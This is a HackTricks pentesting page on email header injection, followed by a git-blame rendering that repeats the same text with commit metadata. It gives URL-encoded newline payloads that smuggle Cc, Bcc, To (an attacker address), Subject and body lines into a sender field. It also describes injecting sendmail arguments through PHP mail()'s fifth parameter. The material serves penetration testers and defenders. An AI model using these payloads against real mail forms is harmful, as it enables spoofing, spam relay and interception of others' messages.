hacktricks/pentesting-web/email-header-injection.md



<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>


# Email Header Injection

# Inject Cc and Bcc after sender argument

```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```

The message will be sent to the recipient and recipient1 accounts.

# Inject argument

```
From:sender@domain.com%0ATo:attacker@domain.com
```

The message will be sent to the original recipient and the attacker account.

# Inject Subject argument

```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```

The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

# Change the body of the message

Inject a two-line feed, then write your message to change the body of the message.

```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```

# PHP mail() function exploitation

```bash
# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}
```

## The 5th parameter ($additional\_parameters)

This section is going to be based on **how to abuse this parameter supposing that an attacker controls it**.

This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.

An attacker can **inject extract parameters for sendmail** in this case.

### Differences in the implementation of /usr/sbin/sendmail

**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.

Here are a few examples of different man pages of sendmail command/interface:

* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences

Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)

# References

* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/)
* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)


<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00

			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`


fix mess 2022-05-01 14:41:36 +02:00			`# Email Header Injection`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
fix mess 2022-05-01 14:41:36 +02:00			`# Inject Cc and Bcc after sender argument`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com`
			```

			`The message will be sent to the recipient and recipient1 accounts.`

fix mess 2022-05-01 14:41:36 +02:00			`# Inject argument`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`From:sender@domain.com%0ATo:attacker@domain.com`
			```

			`The message will be sent to the original recipient and the attacker account.`

fix mess 2022-05-01 14:41:36 +02:00			`# Inject Subject argument`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00			```
GitBook: [master] one page modified 2021-05-03 20:33:45 +02:00			`From:sender@domain.com%0ASubject:This is%20Fake%20Subject`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			```

			`The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.`

fix mess 2022-05-01 14:41:36 +02:00			`# Change the body of the message`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00
			`Inject a two-line feed, then write your message to change the body of the message.`

GitBook: [#2864] update 2021-11-27 02:09:08 +01:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.`
			```

fix mess 2022-05-01 14:41:36 +02:00			`# PHP mail() function exploitation`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
			```bash
			`# The function has the following definition:`

			`php --rf mail`

			`Function [ <internal:standard> function mail ] {`
			`- Parameters [5] {`
			`Parameter #0 [ <required> $to ]`
			`Parameter #1 [ <required> $subject ]`
			`Parameter #2 [ <required> $message ]`
			`Parameter #3 [ <optional> $additional_headers ]`
			`Parameter #4 [ <optional> $additional_parameters ]`
			`}`
			`}`
			```

fix mess 2022-05-01 14:41:36 +02:00			`## The 5th parameter ($additional\_parameters)`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
			`This section is going to be based on how to abuse this parameter supposing that an attacker controls it.`

			This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.

			`An attacker can inject extract parameters for sendmail in this case.`

fix mess 2022-05-01 14:41:36 +02:00			`### Differences in the implementation of /usr/sbin/sendmail`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
GitBook: [#2876] save 2021-11-30 17:46:07 +01:00			`sendmail interface is provided by the MTA email software (Sendmail, Postfix, Exim etc.) installed on the system. Although the basic functionality (such as -t -i -f parameters) remains the same for compatibility reasons, other functions and parameters vary greatly depending on the MTA installed.`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
			`Here are a few examples of different man pages of sendmail command/interface:`

			`* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html`
			`* Postfix MTA: http://www.postfix.org/mailq.1.html`
			`* Exim MTA: https://linux.die.net/man/8/eximReferences`

fix bad chars 2022-04-06 00:24:52 +02:00			`Depending on the origin of the sendmail binary different options have been discovered to abuse them and leak files or even execute arbitrary commands. Check how in [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
fix mess 2022-05-01 14:41:36 +02:00			`# References`
GitBook: [#2864] update 2021-11-27 02:09:08 +01:00
fix bad chars 2022-04-06 00:24:52 +02:00			`* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)`
			`* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)`
Ad hacktricks sponsoring 2022-04-28 18:01:33 +02:00

			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`